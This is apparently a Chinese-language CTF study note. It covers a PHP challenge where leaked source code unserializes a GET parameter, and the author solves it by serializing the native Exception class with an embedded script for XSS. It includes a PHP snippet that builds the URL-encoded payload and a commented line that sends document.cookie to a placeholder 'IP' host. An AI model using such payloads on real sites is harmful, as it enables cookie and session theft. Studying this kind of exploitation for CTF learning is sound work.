一、自己做:
就到源码泄露那里,而且我自己也不会git操作。。。
-<?php
-$a = $_GET['yds_is_so_beautiful'];
-echo unserialize($a);
二、不足&&收获
- 进一步晓得了 PHP 反序列化中的原生类的应用
- alert(1)不行的时候,多试试别的。什么弹cookie 啊。跳转网页啊。都试试
三、学习WP
没有类的情况下,可以进行原生类反序列化
参考文献:反序列化之PHP原生类的利用。有xss的也有SoupClient。不错
然后就easy了。
刚开始构造的 参考资料中的 alert(1) 不对,不行。
然后就看WP说,获取cookie就好,试了试,,,获取cookie也不对
又有说 跳转网页就对了。。。
这次对了。
<?php
$a = new Exception("<script><a href='a webset'</a></script>");
// <script>window.location.href='IP'+document.cookie</script>
$b = serialize($a);
echo urlencode($b);
随意一个跳转页面的操作即可
